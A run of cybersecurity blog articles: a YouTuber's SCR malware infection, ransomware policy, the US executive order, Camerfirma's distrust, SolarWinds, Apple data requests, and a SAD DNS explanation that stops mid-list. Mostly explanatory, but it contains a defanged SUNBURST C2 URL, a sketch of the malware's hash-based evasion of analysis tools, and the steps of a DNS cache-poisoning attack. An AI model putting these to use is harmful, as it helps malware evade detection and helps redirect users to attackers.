This youtuber has more than 700,000 subscribers and is well known in his sector. His daily business involves dealing with suppliers, manufacturers, advertisers... who send him emails with attached documents. He knows perfectly well not to click on links to unknown domains or downloads, he uses an antivirus to check Office documents and PDFs, and he does not trust unsolicited approaches. He uses two-factor authentication on all his accounts and... has a friend to call in case of emergency. One day he received an email from a supplier with whom he had been exchanging emails for several days. He didn't know him, but a relationship had been established. The supplier was actually the attacker, and he had taken the trouble to talk to our youtuber, propose business and wait for the right moment (several days) before sending him a supposed video. The file weighed 65 megabytes, so the attacker sent a Dropbox link, which the youtuber downloaded to his computer.

Still, he didn't trust it. He looked at the extension; he knows he shouldn't launch executables. The extension was SCR. The attacker hadn't bothered to use a double extension, though he might as well have; our youtuber had configured Windows to display file extensions. The file icon represented a video. What is SCR? he asked himself. He googled it and found that it was something to do with screensavers. That might make sense for a video, he thought. Then he right-clicked on it, intending to scan it with his antivirus. Nothing; it detected nothing. Then he saw something curious: "Test", in bold. Could he test the file before launching it? It made sense to him, and he concluded that it would be a good security measure to "test" this SCR before running it. Besides, he doesn't work from an administrator account, and the file had already been scanned by the antivirus, which made him feel safer. So he ran it as a "test".

What he didn't know is that he was simply running it. SCR files are executables in every sense. Screensavers (and this is a little-known fact) can be run in "test" mode on any Windows system, but there is really little to test: launching an SCR as a "test" is the same as executing it, and the whole malware payload runs in exactly the same way. The video icon is trivial to embed in the file, and the 65-megabyte size is artificial, pure filler, to reinforce the impression that it is a video. The youtuber was already infected.

The suspicion and the call

The alleged video did nothing; it would not play. And this alerted our youtuber. Something was going on, as the system CPU kept spiking to 100%. He watched the screen, trying to kill some process, but he wasn't sure what the malware was or what it was doing. After a few minutes he decided to shut down the computer and call me personally. He told me what had happened: the alleged video, the precautions... I told him to change all his passwords immediately, while we were talking, to do it from a different mobile or tablet, and to protect his channel. But I have two-factor, he said. I told him that it didn't matter, that they could have stolen his session cookies.
The SCR could have sent the attacker all the tokens of the sessions open in his browser and, if the attacker was paying attention at that moment, he could get into the accounts. In fact, the youtuber told me the attacker had specifically asked him to say when, more or less, he would watch the video, claiming to be in a hurry. I asked him if he stored any passwords in his browser and he said no, thank goodness. While I was warning him about all this, he tried to change some passwords. He had trouble remembering all the identities he used online, he didn't have a step-by-step emergency procedure, and now he was regretting it. But in the middle of the call... he got cut off. I stopped hearing him. I tried to call him back but there was no way; the phone wasn't on. It was as if everything had suddenly been switched off completely. Although it was strange, I assumed his battery had run out and he couldn't charge it at that moment. After about 15 minutes he called me back. This time he was really scared.

The attack

He told me that, while he was talking, the phone had rebooted and started reformatting itself in his hands. It was an Android. He felt he was being watched; he was genuinely panicking. Do you use the "Find My Device" service? I asked. Yes, of course, he replied. It was clear that the attacker had accessed the Gmail account associated with the phone and requested a remote wipe of the Android. Is that the same account you use for YouTube? "No," he said. "That account is just for the phone!" Well done. It was simply one of the accounts whose password he hadn't yet changed and whose sessions he hadn't closed: the only one the attacker could still access, and with which he was now desperately trying to inflict maximum damage. I tried to reassure him. He had a bootable USB stick with a Linux distribution, so I guided him through running an antivirus, deleting the malicious file (which was already gone) and its potential leftovers, recovering some documents, and so on. He had no faith in the cleanup, so after recovering his data he decided to format his Windows. We went through all his accounts once again and, on a completely clean system, he finished changing and tidying up his passwords. I didn't recommend formatting the Android, because the attacker had already done it.

Conclusions

Our youtuber did a lot of things right:

He had two-factor authentication.
He trusted no one.
He questioned files and attachments.
He did not store passwords in the browser, and he segmented his accounts (one for the phone, one for the channel...).
He had other systems from which to operate in case of emergency, such as a USB key or tablets.
He shut down the computer as soon as he suspected an attack.

What he did wrong:

He did not probe further into the nature of an SCR file, which is an executable. In fairness, the "Test" entry in the context menu did not help him make the right decision.
He did not have a list of accounts whose passwords should be changed in an emergency.

And yet, he was lucky. The quick password change was effective: it kept the attacker out of his channel and his email. The one account he forgot, the one associated with his Android phone, suffered the attacker's wrath. The attacker seems to have been very specifically after the channel, so getting at the phone did not yield a comparable bounty.

The clearest conclusions could be: awareness-raising is not enough. Or, in other words, even complete awareness is not enough, depending on how you look at it. At any time, all our digital identities or files can be compromised.
Apart from backups, there needs to be a clear protocol that can be run from another system. It can be as simple as a list in a TXT file and a series of URLs where passwords must be changed, but it should exist, along with a clean boot system for a computer, just in case.
November 11, 2021
Cyber Security
What On Earth Is Going on With Ransomware And Why We Won't Stop It Any Time Soon
In recent months it has not been rare to read, every now and then, about a large company falling victim to ransomware, either brought to a halt or extorted. Anyone reading this has some recent examples in mind. It is a devastating epidemic that, let's face it, is not going to stop anytime soon; at least not until, as with the viral pandemic we are also suffering, we manage to coordinate all the relevant forces globally. Let's look at the minimum that is necessary.

Because of the global COVID pandemic, many people have come to understand basic concepts that can be carried over to cyber security. For instance, the importance of layered security and complementary mitigations (ventilation but also masks, hand washing but also social distancing... even when vaccinated). We have also questioned the concept of a false sense of security (outdoor masks: are they really useful in all circumstances?). We have learned notions such as weighing the risks and benefits of a measure (potential side effects of a vaccine versus the real risk of contagion)... Perhaps with all this, the average user is better prepared to understand how complex problems like ransomware require multiple complementary approaches once the severity of the threat is understood. Until that is understood, defence measures are likely to be erratic, incomplete, insufficient; a process of trial and error (we went through a phase of underestimating the danger of the coronavirus, initially emphasising the use of gloves until, as more research was done, the focus shifted to masks...).

Did anyone believe that, with social distancing and masks alone, we would end the pandemic in 2020? We suppose that (let's be honest) deep down we knew they were necessary, but not sufficient. We always pinned our hopes on vaccines, because we knew something was missing from the equation to win the war. We were "defending" against the virus, but not yet "attacking" it as a strategy. And that is perhaps where we are now, if we draw the parallel with ransomware: something is still missing.

Something very similar happens in the field of security. The first thing is to understand the risks well... and this is what reality is forcing us to do, with a great deal of discomfort. Then we must propose mitigations that (again, let's be realistic) will not be effective on their own or in the short term. Unless all strategies and actors work together globally, persistently and with the same level of maturity, the strategy will fail. Without that, we will continue to suffer more or less aggressive waves of attacks.

They Are Way Ahead of Us

The malware industry developed in the early 2000s, when cyber security was still called computer security and was just a thing for crazy people. Attackers are way ahead of us when it comes to organising attacks and connecting them to the global crime industry. First they tried to get rich with banking trojans and, when that breach was closed because the legitimate industry reacted, and as we became more dependent on digitalisation, they turned to extortion, the magic formula they successfully explored and still maintain. First by locking users' screens, then by encrypting their files. Next they moved on to hijacking SMEs, from there to large companies, from these to all kinds of organisations and finally to the critical infrastructure of entire countries, which is where we are now. They show no hesitation: they attack where the impact can put lives at risk or destabilise a country, wherever they know it is easiest to get paid.
In these circumstances, it does not seem so easy to follow the mantra of "don't pay". The legitimate industry matures at a different pace, much more reactively. Although it may not seem like it, where we are perhaps best positioned is in company awareness (there was no other choice) and, to a degree, technically. We concentrate on patching and responding, auditing and certifying within our budgets. This prevents many security problems. But attackers move faster at the technical level (against harder defences, they exploit more complex vulnerabilities earlier and better), and there we will always lose. We will not move fast enough against the ransomware industry if we do not bring other actors on board as well. As with the pandemic, what will change the rules of the game and let us bend the curve will not be individual "technical" responsibility alone, but global coordination at the scientific, economic and legal levels; in other words, the equivalent of the enormous global public-private and logistical effort that vaccines represented, but in cyber.

What Is the Vaccine for the Ransomware Epidemic?

Everything counts, but the most important thing is to coordinate so that attackers lose their motivation for this type of attack: to discourage them technically (the cost of breaking into certain systems), economically (the profit from extortion) and legally (the punishment if they are caught). How to strangle them economically? By not paying? It is not that simple. AXA recently took a decision in France: its cyber insurance coverage will cover certain damages but will not reimburse ransom money to clients who pay the extortion. Cyber insurers such as AXA have concluded that this clause normalised precisely the least traumatic way out: paying and giving in to extortion. And, we also assume, it did not pay off given so many incidents. Normalising payment has not only made the insurance business unprofitable but has also fuelled the cybercrime industry itself. But what is the alternative for organisations that must close down if they do not pay? Either they give in to extortion and feed the process that strengthens the attackers, or they refuse to pay and lose everything. In this respect, cyber insurers have yet to find a sustainable, viable model and their niche as a relevant actor: insuring companies under a premise of minimum cyber security adoption and adapting policies correctly; energising the industry to minimise risk (so that clients do not fall back on their insurance so much) and, in the worst case, helping effectively in recovery.

On the legal side, Joe Biden recently signed an Executive Order to improve national cyber security and thereby protect the federal government's networks efficiently. The attack on pipeline operator Colonial Pipeline was the final straw. This executive order aims to update defences and will mean that companies have to meet minimum standards. And in case we were still missing laws to make it easier to prosecute attackers, identify them and impose global sanctions, progress was recently made in this direction too: ransomware will be treated as terrorism. Another way to discourage attackers. In short, the ransomware business must be tackled not only by preventing the financing of extortion, but also by improving companies' end-to-end security and with effective laws that prosecute criminals with exemplary penalties. Easy to say, complex to orchestrate and implement.
And Finally, Let's Not Forget That This Is a Global Problem

Supply chains are a serious problem for cyber security; the SolarWinds incident made this clear. An interconnected world demands global measures at every step of the chain. As with vaccines, none of us is safe until we have all received our doses. When we know how to apply all these mitigations from different angles and each actor has found its niche, we must also ensure that they are applied by all actors globally, large and small, even those who think it is not their problem (much as the US offers prize draws for those who get vaccinated, to motivate the vaccine sceptics). This combination of global actors, approaching the problem from different angles and according to their capabilities, is the best vaccine against ransomware. Patience: it will not be solved in the short term because of the complexity of the situation... but it will happen. The necessary elements are already in place. Let us apply defensive techniques on the technical side, but also offensive ones at other levels.
June 14, 2021
Cyber Security
And the President Said, "Enough Is Enough". The New Cyber Security Proposals from The White House
Joe Biden has signed an Executive Order to improve national cyber security and protect federal government networks more efficiently. The attack on oil pipeline operator Colonial Pipeline, a story that reached the mainstream media, was the last straw. Although the cyber security industry could sense that ransomware would end up attacking critical infrastructure and causing chaos, it has taken the threat materialising for a reaction to occur. And hopefully it will have beneficial consequences. Cyber security now has another game-changing attack to remember in its history.

Negative events capable of changing the laws, the paradigm or the collective awareness of an industry can be counted on one hand. In cyber security, without claiming to cover every case, we can perhaps point to Blaster and Sasser in 2003, which completely changed the perception of security at Microsoft, already quite damaged at the time. Stuxnet in 2010 warned us about cyberweapons and made the world aware of the new cyber and geopolitical strategy. And of course WannaCry in 2017, a blow to the industry's pride for being hit, at that stage, by a worm that exploited an already fixed vulnerability. Despite years of dealing with ransomware, it has taken the threat materialising in an impact with serious consequences for the United States to tighten the rules. If we think about it, it was the next logical step in the escalation: from attacking users to hijacking SMEs, from SMEs to large companies, from these to organisations and from there, it was assumed, to critical infrastructures. But the incident (along with many others that have followed) has finally prompted the president to react. This executive order aims to modernise defences but above all to focus on a problem that, despite the seriousness of the situation, can still be mitigated. Fundamentally, the order aims to increase information sharing between the government and the private sector and to improve the ability to respond. The basic action points are:

- Allow private companies (especially those hosting servers) to share information with the government. This will speed up the investigation process when incidents occur involving access to a server. They will also have a maximum time limit for reporting such incidents.
- Improve and adopt cyber security standards in the federal government. This is a commitment (at a high level, although specific technologies are mentioned) to adopt the best standards (2FA, cryptography, SDLC...) from within the government's own infrastructure.
- Improve supply chains, as the SolarWinds attack has taught us. Software sold to the government will have to meet minimum security requirements. There will be a kind of certificate of accreditation, similar to those for energy efficiency or emissions.
- A private and public cyber security review board or commission. When an incident occurs, it will be managed and conclusions will be drawn in a coordinated manner. This commission is inspired by the one already in place in aeronautics, where the private and public sectors meet after major air incidents.
- A standard incident response system, both internal and external. Companies will no longer have to wait for something to happen before they know what needs to be done.
- Improve the defence capability of the federal network. Perhaps the most generic measure, which aims to reinforce the entire government infrastructure with appropriate cyber security tools.
- Improve remediation and investigation capacity.
Perhaps this last point comes down, basically, to improving logging systems.

And Now, What?

This executive order will mean that companies have to comply with minimum standards, procedures, audits... In short, it will create a healthier industry, one that monitors itself more closely. More robust and united, we hope. Something similar to what the debit and credit card companies did when they implemented the PCI-DSS initiative, which obliged everyone who worked with this data to pass a minimum audit. While it will not solve the problem entirely, it will improve it significantly. It puts the focus on cyber security at the highest level, joins forces and, as mentioned, attacks the problem from a political and legal perspective that complements the technical approach, which is insufficient on its own. However, there is still a lack of clearer laws against attackers that would make it easier to prosecute them, identify them and impose sanctions at a global level. There is now political and legal support to promote security from a technical point of view, but cyber is also legal, social, political... and the activity of attackers must be tackled from all these angles. Such a serious problem, although technical in nature, cannot be solved from that angle alone. If we merely concentrate on patching and responding, auditing and certifying, we will not make enough progress. In any case, this order is great news and a first step in that direction.
June 4, 2021
Cyber Security
26 Reasons Why Chrome Does Not Trust the Spanish CA Camerfirma
Starting with the imminent version 90, Chrome will show a certificate error when a user tries to access any website with a certificate signed by Camerfirma. It is perhaps not the most popular CA, but it is very present in Spain in many public organisations, for example the Tax Agency. If this ban by Chrome is not resolved before the income tax campaign, there may be problems accessing official websites. Many other organisations in Spain (including the COVID vaccination campaign website, vacunacovid.gob.es) also depend on its certificates. But what happened, and why exactly did Chrome stop trusting this CA? Microsoft and Mozilla still trust it, but of course Chrome's decision will create a chain effect that will most likely make it impossible to trust anything issued by this CA from the main operating systems or browsers.

In the coverage of this issue there has been talk of Camerfirma's failures and its inability to respond to and solve them, but to be fair, we need to know a little about the world of certificates. The first thing to understand is that all CAs make mistakes: a lot of them, always. Just take a look at Bugzilla. The world of cryptography is extremely complex, and the world of certificates as well. Following the requirements is not always easy, and that is why the CA/Browser Forum and many researchers are responsible for ensuring that the certification authorities function properly and comply strictly and rigorously with the standards. They are therefore very used to failures, mistakes and oversights, and tolerate problems to a certain extent as long as they are reversed in time and corrected. It is a question of showing willingness and efficiency in management, rather than of being perfect. Incidents occur daily and are varied and complex, but CAs usually react by solving them and increasing vigilance, which improves the system day by day. Sometimes, though, trust in a CA is lost because a certain limit is crossed in its responses and reactions. In the case of Camerfirma, the key seems to be that they have been making mistakes for years, some of them repeatedly, and have shown too many times that the remedies and resolution practices of this trusted authority cannot themselves be trusted. Moreover, their excuses and explanations often do not add up. Chrome's reaction thus demonstrates that cryptographic security must be taken seriously, and that it will not accept CAs that confess to being understaffed, ignore specifications, etc. These moves are necessary. But with decisions like this, Chrome is on its way to becoming a de facto CA. We have already mentioned that traditional CAs are losing control of certificates. This could be one of the possible reasons why Chrome will have a new Root Store.

26 Reasons

We will describe the reasons very briefly and in (subjective) order of importance or relevance. The text in quotation marks is verbatim from what we have found in the Bugzilla tracker, which at times seems to gloat over the fragility of Camerfirma's excuses. To be fair, they have to be read in their full, particular context to be understood. Even so, what emerges on the one hand is a certain inability on Camerfirma's part to do the job entrusted to a serious CA, capable of responding in time and form... and on the other, a significant weariness on the part of those who ensure that this is the case.

One: In 2017, the world stopped trusting WoSign/StartCom as a CA for various reasons.
Camerfirma still had a relationship with StartCom as a way to validate certain certificates, and it did so under the criteria of "other methods", which is the strangest (and last-resort) way to achieve this and therefore raises suspicions. The CA/Browser Forum did not want these "other methods" to be used (they came from an outdated specification) and did not want certificate validation to be delegated to StartCom. Camerfirma did not rectify the situation and continued the relationship with StartCom without making it clear how.

Two: They did not respect the CAA standard. This DNS record should state which CAs are authorised for a website. For example: I never want CA X to issue a certificate for me... or I only want CA Y to issue certificates for my domain. Camerfirma thought that, since certificate transparency existed, they could avoid respecting CAA, because "they were in a hurry and misunderstood the requirements". (A CAA lookup sketch appears at the end of this article.)

Three: OCSP responses (used to revoke quickly) did not comply with the standards.

Four: It was discovered that the Subject Alternative Name fields of many of their certificates were wrong. When this was reported to Camerfirma, there was no response, because these reports "went to only one person", who did not respond. Camerfirma never "intentionally" fixed certificates of this type and, even after revoking some of them, reissued them incorrectly.

Five: Intesa Sanpaolo, one of Camerfirma's sub-CAs, also made several mistakes when it came to timely revocation. It even issued a certificate for "com.com" by "human error".

Six: They made certain revocations by mistake, confusing the serial numbers of valid and invalid certificates. Camerfirma decided to perform a "de-revocation", which is intolerable in the world of certificates, and implemented it inconsistently at that. In the midst of all the trouble, they claimed that they would use the EJBCA management software to mitigate this in the future, but then they didn't... then they confirmed that they would develop their own software with similar features. As not much more was heard about this afterwards, they claimed to be holding "daily meetings to discuss these issues".

Seven: Camerfirma infringed a rule related to the inclusion of the issuer's name and serial number in the key ID field (which you must not do). All Camerfirma certificates had been doing this wrong since 2003. They claimed they had got it wrong and fixed it at the end of 2019, but they did not revoke the previously issued certificates. In 2020 they reissued certificates that infringed this policy, which they did not revoke either.

Eight, nine and ten: CAs are not supposed to issue certificates with underscores in domain names. Owing to "human error" in their issuing and detection, they were not able to detect them in time and some slipped through. The same happened with a domain name containing the character ":", and with a domain that existed but was misspelled in the certificate.

Eleven: Camerfirma (and others) issued sub-CAs that could give OCSP responses on behalf of Camerfirma itself, because they had not included a suitable restriction in the certificates' EKUs (EKUs are fields that limit a certificate's power and use). They argued that they were not aware of this security flaw and did not revoke them in time. The reason for not revoking was that one of the sub-CAs was used in the healthcare smartcard sector, and revoking would have meant replacing those smartcards.
The problem was so important that it had to be escalated to higher bodies at a national level. On 2 October 2020, it appears that the keys on these cards were destroyed, but the destruction was supervised and witnessed neither by a qualified auditor nor by Camerfirma itself.

Twelve: They issued a sub-CA for S/MIME use to the government of Andorra, which they did not audit. When they finally did, it was found to have made quite a few mistakes. In the end they had to revoke it, claiming that, as these were not TLS certificates, they thought they were outside the scope of the audits. Again, the underlying problem seemed to be that they did not have sufficient staff.

From thirteen to twenty-six: We have cheated here to group together all the other reasons, which are very similar. For example, dozens of technical failures in other certificate fields that they were unable to revoke in time. The excuses were varied: from local legislation obliging them to use formulas that did not comply with the standards (something they did not prove)... to the claim that their system had worked well for 17 years but, as it grew too much, some internal controls failed. Sometimes there were no excuses; they simply did not respond to requests. In one incident, they were supposed to disclose the existence of a sub-CA within a week of its creation, but did not do so. What happened, according to them, was that "the person in charge was not available". Neither was that person's back-up. Camerfirma tried to solve this by saying that they would put in place "a backup for the backup person in charge of this communication". To explain other problems, they claimed that their staff was completely "overloaded" or "on holiday". Basically, across all the errors common to many certificates (insufficient entropy, incorrect extensions...), Camerfirma consistently failed to revoke certificates in time and form.

Conclusions

It is not easy to be a CA. Camerfirma is not the first to be distrusted, nor will it be the last. Even Symantec suffered a setback in this respect. FNMT also had a hard time getting Firefox to include its certificate in its repository, and it took several years. At some points in that incredible story with FNMT, one also senses a lack of adequate staff to meet Mozilla's demands. The world of certification is a demanding one. But it must be. The internet that has been built literally depends on the good work of the CAs. Tolerating a CA that deviates one millimetre from continuous vigilance, control and rigour, or fails to respond in a timely manner, is like being lenient with a police officer or a judge who shows any hint of corruption. It should not be tolerated, for our own sake and because of the significant consequences it would entail.
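As promised in reason two, anyone can check a domain's CAA policy themselves. A minimal sketch, assuming the third-party dnspython library; the domain is illustrative:

```python
# Query a domain's CAA record: the DNS entry that tells CAs whether
# they may issue certificates for it (the standard Camerfirma failed
# to respect). Requires: pip install dnspython
import dns.resolver

def print_caa(domain: str) -> None:
    try:
        answers = dns.resolver.resolve(domain, "CAA")
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
        print(f"{domain}: no CAA record (any CA may issue)")
        return
    for rdata in answers:
        # e.g. flags=0 tag=issue value=letsencrypt.org
        print(f"{domain}: flags={rdata.flags} tag={rdata.tag.decode()} "
              f"value={rdata.value.decode()}")

print_caa("example.com")  # illustrative domain
```

A CA is expected to make this query before issuing; for everyone else the record is merely informative, but it makes violations easy to spot.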
February 1, 2021
Cyber Security
The Attack on SolarWinds Reveals Two Nightmares: What Has Been Done Right and What Has Been Done Wrong
All cyber security professionals now know at least part of what was originally thought to be "just" an attack on SolarWinds, and which has turned out to be one of the most interesting operations of recent years. We will dwell on the more curious details of the incident, but we will also focus on the management of this crisis: what has been done right and what has been done wrong, to gauge the maturity of an industry that will suffer more and worse attacks than this in the future.

FireEye raised the alarm on Tuesday 8 December: they had been attacked. The industry did not blame FireEye for this but backed and supported them; their response was exemplary. It has happened to many and it can happen to all of us, so what matters is how you deal with it and how resilient you are. Since the attackers had gained access to sensitive internal tools, FireEye did something for the industry that honours them: they published the Yara rules needed to detect whether someone was using the tools stolen from FireEye's offensive team against a company. A fine gesture that was again publicly credited. At that point not much more was known about the incident, which was still being investigated. But then everything got complicated, and in a massive way. The news began: the US Treasury Department and many other government departments also admitted an attack. On the same day, the 13th, FireEye offered a very important detail: the problem lay in the trojanisation of SolarWinds' Orion software. An update package, signed by SolarWinds itself, included a backdoor. It is estimated that over 18,000 organisations use this system. Pandora's box was opened, because of the characteristics of the attack and because the software is used in many large companies and governments. And since global problems require global and coordinated reactions, this is where something seemed to go completely wrong.

Did the Coordination Fail?

The next day, 14 December, with the information needed to point at "ground zero" of the attack, the reactive mechanisms still did not work. In particular:

- The trojanised package was still available in the SolarWinds repository, even though by the 14th it had been known for at least a week (most likely longer) that the package was trojanised and had to be removed.
- Antivirus engines were still unable to detect the malware (which has become known as SUNBURST). On that same Monday it was not found in the static signatures of the popular engines.
- The certificate with which the attackers' software was signed had still not been revoked. Whether or not they gained access to the private key (unknown), that certificate had to be revoked in case the attackers were able to sign other software on behalf of SolarWinds.

Here we can only guess why this "reactive" element failed. Was SolarWinds late in learning of the attack? Did FireEye publish the details to put pressure on SolarWinds once it was already clear that the attack concealed a much more complex offensive? The stock market, if it can be used as a quick gauge of the reaction to a serious compromise, has "punished" the two companies differently: FireEye has turned out to be the hero, SolarWinds the villain. However, some reactions did work, such as Microsoft seizing the domain on which the whole attack was based (avsvmcloud.com). Which, by the way, had been submitted manually to urlscan.io from Spain on 8 July. Someone may have noticed something strange. The campaign had been active since March.
Source: https://twitter.com/sshell_/status/1339745377759576065

The Malware Itself and the Community

The "good" thing about SUNBURST is that it is written in .NET, making it relatively easy to decompile and to see what the attacker programmed. And so the community began to analyse the software from top to bottom and to write tools for a better understanding. The malware is extremely subtle. It did not activate until about two weeks after landing on the victim. It modified scheduled system tasks to launch itself and then returned them to their original state. One of its most interesting features is the ability to hide the domains it uses, which required brute force to reveal (they were stored as hashes). In addition, it contained the hashes of other domains it did not want to infect. Which ones? Most likely all those internal to the SolarWinds network, so as to go unnoticed inside it. An indication that the initial victim was SolarWinds itself, and that to achieve this the attackers had to know their victim well. Code was also published to recover the list of security tools (their names were hashed too) and find out what the trojan did not want to see on the machine; many of the hashed tools and domains were revealed in record time, making it possible to work out what the attackers had in mind (see the hash-blocklist sketch at the end of this article). Another tool was published to decode the DGA (Domain Generation Algorithm) with which the malware built the domains it contacted. The DGA was one of the strong points of the operation, but also its weak point (the top-level domain was always the same).

Source: https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

In the end, the malware composed URLs like this: hxxps://3mu76044hgf7shjf[.]appsync-api[.]eu-west-1[.]avsvmcloud[.]com/swip/upd/Orion[.]Wireless[.]xml. There it "exfiltrated" information and communicated with the command and control. Well thought out from the attacker's point of view, because it goes unnoticed thanks to its "normality", but badly thought out from the perspective of persistence. Another very interesting point that seems to have gone unnoticed: during 2019 the attackers appear to have "inflated" the trojanised module from 500 KB to 900 KB without injecting relevant code, simply increasing the size of the DLL. In February 2020 they introduced the espionage payload into the same DLL, thus gaining extra invisibility by not raising suspicions with a sudden increase in size.

Don't Go Yet, There Is Still More

More recently, it has emerged that SolarWinds' Orion was trojanised not only with SUNBURST but also with what has come to be called SUPERNOVA. Perhaps another actor also managed to enter the network and deployed a different trojan in the tool. Although we still do not have many details of how it worked, this is the second nightmare, one that is still unfolding.

Conclusions

We are facing one of the most sophisticated attacks of recent times, which has put in check not only a company dedicated to defending other companies, but also governments, major players like Microsoft and others we cannot even imagine. The attackers have gone one step further, launching a campaign that is almost perfect in its impact and execution.
On other occasions (RSA, Bit9, Operation Aurora...) large companies have also been attacked, sometimes only as a stepping stone to reach a third party, but on this occasion a step forward has been taken in the discretion, precision and "good work" of the attackers. And all thanks to a single fault, of course: the weakest point they were able to find in the supply chain on which major players depend. And yes, SolarWinds looked like a very weak link. On their website they recommended deactivating the antivirus (unfortunately common for certain types of tools), they have been shown to use weak passwords in their operations, and there are indications that they had been compromised for more than a year... twice. Should we be surprised at such weak links in the cyber security chain on which so much depends? We depend on an admittedly patchy landscape in terms of cyber security capability: asymmetric in response, defence and prevention, for victims and attackers alike... but very democratic in the importance of each piece of the industry. There is no choice but to respond in a coordinated and joint manner to mitigate the risk; it is not difficult to find similarities outside the field of cyber security. In any case, and fortunately, the industry has once again shown itself mature and capable of responding jointly, not only through the community but also through the major actors. Perhaps this is the positive message we can pull out of a story that still seems unfinished.
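To illustrate the hashed-blocklist trick described above: SUNBURST compared hashes of process, service and domain names against hardcoded values, so the plaintext names never appeared in the binary until researchers brute-forced them. A minimal sketch of the general idea follows; the FNV-1a variant is a common choice for this, but the constants and names here are illustrative, not the malware's actual parameters:

```python
# Generic hash-blocklist check, in the style attributed to SUNBURST:
# only numeric hashes are embedded in the binary, so a quick string
# dump reveals nothing about which tools or domains are being avoided.
FNV64_OFFSET = 0xCBF29CE484222325
FNV64_PRIME = 0x100000001B3

def fnv1a64(data: bytes) -> int:
    """Standard 64-bit FNV-1a hash."""
    h = FNV64_OFFSET
    for b in data:
        h ^= b
        h = (h * FNV64_PRIME) & 0xFFFFFFFFFFFFFFFF
    return h

# In real malware only the hash values would ship; we compute them from
# illustrative names here so the example stays self-contained.
BLOCKLIST = {fnv1a64(n.encode()) for n in ("wireshark", "procmon", "autoruns")}

def is_blocked(name: str) -> bool:
    return fnv1a64(name.lower().encode()) in BLOCKLIST

print(is_blocked("Wireshark"))  # True: the analysis tool is spotted
```

Recovering the original names means hashing candidate dictionaries until a value matches, which is exactly the brute force the community performed in record time.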
December 22, 2020
Cyber Security
Tell Me What Data You Request from Apple and I Will Tell You What Kind of Government You Are
We recently found out that Spain sent 1,353 government requests for access to Facebook user data in the first half of 2020. Thanks to Facebook's transparency report for that period, we discovered that government requests for user data rose from 140,875 to 173,592 worldwide. A few weeks ago, Apple published its report for the second half of 2019, which also shows what was requested in Spain and in other countries. Sometimes governments need to rely on large corporations to do their job. When a threat involves knowing the identity, or accessing the data, of a potential attacker or of a victim in danger, the digital information stored by these companies can be vital to the investigation and to preventing a disaster. We have prepared some graphs to try to identify, from this publication (which only contains tables of numbers), what governments are most concerned about.

Device-Based Requests

These are requests about devices, for example when law enforcement agencies act on behalf of customers whose device has been stolen or lost. Apple also receives requests related to fraud investigations, typically asking for the details of the Apple customers associated with certain devices or connections to Apple services, from an IMEI to a serial number. Spain requested information on more than 2,600 devices, of which just over 2,100 were granted, all in 1,491 requests. In Germany, theft is the most common justification for these requests; in the USA, repair-related fraud.

Requests Based on Financial Data

For example, when law enforcement acts on behalf of customers who need assistance with fraudulent credit card or gift card activity used to purchase Apple products. Japan leads, followed by Germany and the United States. Normally the USA demands the most, although this half-year it came third; Japan has shot up. In Spain, almost all requests relate to iTunes card fraud or credit card fraud.

Account-Based Requests

These are requests to Apple regarding accounts that may have been used in violation of the law or of Apple's terms of use: iCloud or iTunes accounts and their name, address and even content in the cloud (backups, photos, contacts...). This is perhaps the most intrusive measure, in which Apple hands over genuinely private content. Usually China and the United States request the most data, but this time Brazil breaks into the top spots. Apple can refuse if it finds any failure of form or substance. Note that, in addition to providing the data, Apple may hand over "metadata" not directly related to it; this also means providing information, yet does not count as a "satisfied" request. Spain requested 73, of which 51 were granted.

Emergency Requests

Under the U.S. Electronic Communications Privacy Act (ECPA), Apple may be required to provide private account information if, in an emergency, it believes that doing so may avert a danger to life or serious harm to individuals. Interestingly, here the UK leads with over 400 accounts, followed by the United States. The remaining countries make only dozens of requests, almost always satisfied. Spain, none. Does the UK care more about emergencies and limit itself to requesting data only in such cases?

Requests Related to the Withdrawal of Apps from the Market

These usually involve apps that allegedly violate the law.
China continues to be the country that requests the most app withdrawals, almost all related to pornography, illegal content or operating without a government licence. The 18 apps requested in Austria and the 2 in Russia were related to illegal gambling. The 33 requested by Vietnam, also gambling-related, were not withdrawn.
December 1, 2020
Cyber Security
A Simple Explanation About SAD DNS and Why It Is a Disaster (or a Blessing)
In 2008, Kaminsky shook the foundations of the Internet: a design flaw in DNS made it possible to fake responses and send a victim wherever the attacker wanted. Twelve years later, a similar and very interesting formula has been found for poisoning the cache of DNS servers. It is even worse than Kaminsky's, fundamentally because the attacker does not need to be on the same network as the victim, and because it has been announced while many servers, operating systems and programs are still unpatched. Let's see how it works in an understandable way.

To fake a DNS response and return a lie to the client, the attacker must know the TxID (transaction ID) and the UDP source port. This implies 32 bits of entropy (two 16-bit fields to guess). SAD DNS consists, basically (the paper is very complex), in inferring the UDP port through an ingenious method that uses ICMP error messages. If the port is inferred, only the 16-bit TxID remains, an entropy low enough for a practical attack. Once you have these two values, you build the packet and bombard the name server.

How to Infer the Open UDP Port

The necessary background is that, due to how UDP works, the server opens ephemeral UDP ports through which it communicates with other name servers. Knowing these ephemeral ports is vital because, together with the TxID, they are everything an attacker needs to fake a response. In other words, if a server (resolver or forwarder) asks another server a question, it expects a specific TxID and UDP port in the response; whoever returns a packet with that data will be taken as the absolute truth and can feed it a false IP-domain resolution. The attacker only needs to discover the open UDP port, deduce the TxID by brute force and bombard the victim.

When you contact a UDP port and ask whether it is open, servers return a "port closed" message via ICMP. To avoid being overloaded with such answers, they enforce a global limit of 1,000 per second. A global limit means it does not matter whether the queries come from 10 or 100 different sources: in total, the server will send at most 1,000 "port closed" responses in one second. This mechanism, designed to avoid overloading the system, is what actually causes the whole problem. The global limit is 1,000 on Linux, 200 on Windows and FreeBSD, and 250 on macOS. In reality, the whole paper is built on exploiting this fixed global limit. It needs revisiting: the dangers had been warned about before, but never with such a practical attack and application. It is also important because not only DNS but also QUIC and HTTP/3, which are based on UDP, can be vulnerable.

The attack is complex and each step has its own details and mitigations, but fundamentally the basic steps are (with potential inaccuracies for the sake of simplicity) the following:

1. Send 1,000 UDP probes to the victim resolver with faked source IPs, testing 1,000 ports. In practice this is a batch of 50 every 20 ms, to stay under another, per-IP response limit that the Linux operating system enforces.
2. If all 1,000 ports are closed, the victim will return (to the faked IPs) 1,000 ICMP error packets indicating that the port is not open. If a port is open, nothing happens: the probe is simply consumed by the application on that port.
3. It does not matter that the attacker never sees the ICMP responses (they go to the faked IPs). What matters is how much of the global limit of 1,000 responses per second is used up by that batch.
